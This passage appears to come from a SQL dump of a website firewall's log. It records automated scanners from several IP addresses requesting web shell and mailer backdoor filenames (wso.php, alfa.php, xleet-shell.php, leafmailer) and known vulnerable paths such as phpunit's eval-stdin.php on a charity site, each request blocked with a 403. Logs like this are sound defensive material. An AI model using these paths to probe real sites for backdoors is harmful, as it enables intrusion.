1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/01.php','','{\"1\":\"python-requests\\/2.26.0\"}','QBd89Z4ICxjrOu3y0iL5qYXE',0,1674085556.6781,569,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"python-requests\\/2.26.0\"}','KYp1VE23B0H9bA8PXR5o6n7w',0,1674085558.0447,663,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/02.php','','{\"1\":\"python-requests\\/2.26.0\"}','V1vzLYWEB65fMaSJwZdbqrjH',0,1674085559.5344,898,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/2.php','','{\"1\":\"python-requests\\/2.26.0\"}','g39Y8uDKX5MZ1B2z6jvdiI7m',0,1674085561.2347,264,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','Keoyr9GQW6vSfIthzFnNOuLC',0,1674085562.3767,418,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"python-requests\\/2.26.0\"}','fu8R9MOVDwBCFAUaLovln3QE',0,1674085563.5855,774,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/mini.php','','{\"1\":\"python-requests\\/2.26.0\"}','BqMYgDf9u2GiP6K4OUC1Wx7I',0,1674085565.1321,1017,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"python-requests\\/2.26.0\"}','NdFCGLQxZ2RgsbXqDaltMzpv',0,1674085566.9304,759,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"python-requests\\/2.26.0\"}','qdAncNlOvVFQzW8Mbuy7YPS1',0,1674085568.4701,476,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/403.php','','{\"1\":\"python-requests\\/2.26.0\"}','kSxmXOcIeyJFGoB5Kgp78VUP',0,1674085569.8016,861,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','ftUgy4r7McaPj5udReb6hp9s',0,1674085571.4681,633,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/admin.php','','{\"1\":\"python-requests\\/2.26.0\"}','ltFTbegJSAjQnYp8kDUad5KI',0,1674085572.8832,614,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/wp-22.php','','{\"1\":\"python-requests\\/2.26.0\"}','n3YDG1ZFPwi7CqEdlp8fghvS',0,1674085574.2629,715,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"python-requests\\/2.26.0\"}','CR08KrkBaQVfNhYz4bXH2OyE',0,1674085575.7698,547,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/marijuana.php','','{\"1\":\"python-requests\\/2.26.0\"}','U2goPRTCjqXtOyWw4NShI5pL',0,1674085577.1311,830,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/good.php','','{\"1\":\"python-requests\\/2.26.0\"}','eLMnVlsbR0FBrdfjty1xWzuA',0,1674085578.9800,613,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/classes.php','','{\"1\":\"python-requests\\/2.26.0\"}','1jpn3qXVxYShlTNOtUs5CrQ2',0,1674085580.3890,475,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"python-requests\\/2.26.0\"}','EZhJIOHje6zAWq23nTQmoRDx',0,1674085581.6442,652,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.equalitywalk.org.uk/admin/login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko\\/20100101 Firefox\\/64.0\"}','8WfIPswkSbTUhqZVpKcDOHrn',0,1674094507.1222,116,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://equalitywalk.org.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DbcUm3JzyuYSvXkEZi5Njadw',0,1674094658.9062,159,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ASq40GKghYJUpeMobPCQvm2V',0,1674094832.2649,4289,'','GET',403,0,700,0,1,'',0),('188.241.82.13',3169931789,'','https://www.equalitywalk.org.uk/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko\\/20100101 Firefox\\/64.0\"}','1g50TZz4mVO9kBuM3CALRIUw',0,1674094872.8535,3561,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.equalitywalk.org.uk/zet.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','LbtB9vge5XOQqaUxy43C0Zdc',0,1674099515.4007,486,'','GET',403,0,700,0,1,'',0),('147.135.90.124',2475121276,'','https://www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.28.2\"}','jmu4wdnCBeHrG8lIiLsAx3ZE',0,1674103307.1117,139,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5OzyqR0tNuBmXYDdTMeS3WcL',0,1674105532.4273,202,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://equalitywalk.org.uk/.wp-back.phP','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oDPt61iF5INcqSwzuBQMfULp',0,1674105532.8128,167,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://equalitywalk.org.uk/bala.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zLUDbJm8RFqBVtdho2j5YyGO',0,1674105533.2043,128,'','GET',403,0,700,0,1,'',0),('135.181.141.142',2276822414,'','https://equalitywalk.org.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4x1sRgmXtYMUni9pZ0VN8qPG',0,1674105533.6151,105,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/.sts.php','','{\"1\":\"python-requests\\/2.28.1\"}','Z6mQ2CwpuAGYViR8ds9lco4x',0,1674114814.6424,153,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/.Wp-back.phP','','{\"1\":\"python-requests\\/2.28.1\"}','bq0Yn4lZrTaUCvgSFEmsVtOk',0,1674114942.9245,1207,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/fx.php','','{\"1\":\"python-requests\\/2.28.1\"}','ijUEL3BegvPnFbQctD7AwXCN',0,1674115077.5216,150,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','OwT7z9UPK0dvZeYlsp3IHmRy',0,1674115245.3645,169,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp_content/wp-1ogin_bak.php','','{\"1\":\"python-requests\\/2.28.1\"}','fzNT5HVBtdmwaDWgxM9qyZoE',0,1674115485.3554,135,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"python-requests\\/2.28.1\"}','HgY2WeZCkruzKwDU1pERTSN9',0,1674115631.0212,182,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/bala.php','','{\"1\":\"python-requests\\/2.28.1\"}','N5uX2zqIeK4Oyr9cEFtPLTVx',0,1674115810.0084,124,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','KnBe701o9dXCykcGlfxOQR2W',0,1674115964.8491,135,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','5BFDQzILcA0mrvgNy3itus9n',0,1674116116.7766,135,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','SGOiY0be3qlThN4yjaAH7Id6',0,1674116243.2905,205,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','vPJcmeAnKYzjQCL5awiot3k8',0,1674116355.9481,156,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','ejdsgcGPMFlh2LWZ7w8kYoIn',0,1674116440.3114,187,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','IGb7S2DgihJVwUtP9pxXzumv',0,1674116528.2556,162,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','VOMUNbHsLmcT8p9ty4fQ2hKi',0,1674116605.3442,209,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','LwpxcjXErn4GVg5SNMJZe3Do',0,1674116642.3830,112,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','LDd2lMHmxwnbBV9AOfPFEp16',0,1674116737.7208,132,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','rORdKIQ09Tkhb7miwSuEpNAF',0,1674116820.3924,138,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','qsnVbAQvtY3GOjU0urk27l6z',0,1674116921.0179,164,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','SweyKOY6itusFHcklj0hJgGQ',0,1674117050.0240,126,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/p.php','','{\"1\":\"python-requests\\/2.28.1\"}','QwP6SKZnNo9jRDAWsL5fMq08',0,1674117142.3806,112,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/t.php','','{\"1\":\"python-requests\\/2.28.1\"}','sVTyQMihBSwObcAqIrJmPe4W',0,1674117252.1214,111,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','8W1dRczEXAHjPSOKl0GTxwIn',0,1674117349.7795,111,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/w.php','','{\"1\":\"python-requests\\/2.28.1\"}','FH8eMT914VmOsGCYJ3t2Qzkp',0,1674117528.5590,142,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/confiig.php','','{\"1\":\"python-requests\\/2.28.1\"}','il2NzgeGsaKu6TybSfdc8kMQ',0,1674117659.9211,136,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YsF0MQT9nUywzrPAKeaIB1cO',0,1674118925.1730,116,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vA5V89yum3XUsKEnId7b2tkf',0,1674118926.0581,112,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7KlfRtTFCoq2jBX8mGvs4zrI',0,1674118926.9923,87,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YcuH0MK231Gyl85Jh4TxvSAP',0,1674118927.8336,99,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-conetnt/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5ZFGjvLzCEUmeWbI0PwOnBTa',0,1674118928.7024,95,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-admin/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ft2FmavDKY8EVSOqn9JyloCP',0,1674118929.5515,96,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-admin/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','irt6ehA3dGUkWYnjoNEgIV9f',0,1674118931.1818,139,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Tb6e2Mn4s1REmBhWVO3ozSI7',0,1674118932.0759,111,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leaf-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r0AJlfON2eI4PDaTVz5WujRK',0,1674118932.9597,97,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-includes/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1vR8793wtnXMNHBPxayqb5Uc',0,1674118933.8424,126,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-includes/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AfvmpjhDrBN3RcYPJXtOCKwz',0,1674118934.7245,109,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-includes/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EHOQBtN0kU2nYagzhfo1b5GT',0,1674118935.5898,103,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-includes/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AzrXNtikdVeL0Qyb7opvSg3f',0,1674118936.4773,216,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/.tmb/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Cax1wOE5zKRAX2kYVbduHU6I',0,1674118937.6050,91,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/mailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3xTAc5je6WELPFiwraCqZKf2',0,1674118938.4711,88,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cWGZOKgJqCTkEaSn50PQhBdl',0,1674118939.3505,112,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nRHDo381zUgYWSfTQMpOu6er',0,1674118940.3744,119,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yO8dzJLQYl6kXisUCfbp5EgH',0,1674118941.2558,84,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','z6OxXANGo8Lbrn3MwZBpKFHQ',0,1674118942.1423,92,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i0WCV2Uyc5YtAlkRM7Pu14LN',0,1674118943.0542,87,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5dVw9SrQyukZ0Bt84hT2xWFi',0,1674118943.9015,88,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kayKCPJLA25E4dcwZqBUr0fD',0,1674118944.7479,88,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/28.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5XSsaKFD1hwCL4cbnW6yQG3r',0,1674118945.6287,93,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pbVB79LMqy2SigR3IjHAQk8W',0,1674118946.4692,83,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pCSx2tIYuHVcThLoDMn1bjWm',0,1674118947.3125,116,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-maiiler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QupO6G4HmwRa38TnjXzCZoLY',0,1674118948.9442,123,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nPdYaeEbzIUqvhWDLfiF0Buy',0,1674118949.8777,84,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H1rEjwMBhUfqWbvcJ35YCLoO',0,1674118950.7331,135,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LdvpBel3YK4aUCWbr7S8FEjH',0,1674118951.6890,137,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','BMHEXA3hOkcymD0Fo8gjl92L',0,1674121170.4955,1361,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','lgCQTWx0rU5eo4R8cnkLGAwB',0,1674121174.2318,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','yYWTljCKe83DMHZ05EduOQq6',0,1674121190.6862,117,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','s38qzON915LWcx2a4HjpPCXD',0,1674121192.9098,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hV2TGdxtrjgl6uAZsiQMybI1',0,1674121208.7563,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','iZ5dnORvpg6Tt9MFjB3lKbX4',0,1674121209.0037,127,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','RxhDjUJbLlBK2HT0Zfqp1Ovt',0,1674121209.6369,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','oyJSO7u1bDYzLHT8tqvpgmwW',0,1674121211.7950,96,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','FoONr52YEC8l4PLuBvp61jza',0,1674121212.6997,99,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YpnMJP8LsN7DtozZAwIEvK29',0,1674121213.1582,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/0z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jZVm40thcSpfRIxlCNQs6eyT',0,1674121214.9903,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','e4zB7xC913AFWgaY8Epiwrqj',0,1674121216.8585,143,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','cSPewUCOGVxBjbgFurp3hlsQ',0,1674121219.9824,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xcUWMGDZX1FVkdCIBfnaAhi5',0,1674121220.3086,103,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 